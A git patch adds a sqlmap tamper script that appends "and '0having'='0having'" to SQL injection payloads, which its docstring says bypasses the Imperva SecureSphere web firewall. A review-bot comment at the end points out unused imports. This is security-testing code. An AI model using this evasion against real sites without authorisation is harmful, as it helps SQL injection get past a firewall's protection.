From b7433011f8b80326a1336a78edb911967af588b2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Fri, 8 Jul 2011 22:48:03 +0000
Subject: [PATCH] new tamper script by request

---
 tamper/securesphere.py | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 tamper/securesphere.py

diff --git a/tamper/securesphere.py b/tamper/securesphere.py
new file mode 100644
index 000000000..f9e9ccd03
--- /dev/null
+++ b/tamper/securesphere.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.common import randomRange
+from lib.core.data import kb
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Appends special crafted string
+
+    Example:
+    * Input: AND 1=1
+    * Output: AND 1=1 and '0having'='0having'
+
+    Notes:
+    * Useful for bypassing Imperva SecureSphere WAF
+    * Reference: http://seclists.org/fulldisclosure/2011/May/163
+    """
+
+    retVal = payload
+
+    if payload:
+        retVal += " and '0having'='0having'"
+
+    return retVal
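Review bot: `import re`, `from lib.core.common import randomRange` and `from lib.core.data import kb` are unused in the new module — the only project name the file references is `PRIORITY`, and `tamper()` does nothing but append a fixed literal; the three lines look carried over from another tamper script and should be dropped so the module imports only what it reads. The function body itself is fine: `retVal = payload` followed by the `if payload:` guard already returns an empty or None payload unchanged, which the docstring could state explicitly, e.g. `* Empty or None payloads are returned unchanged`.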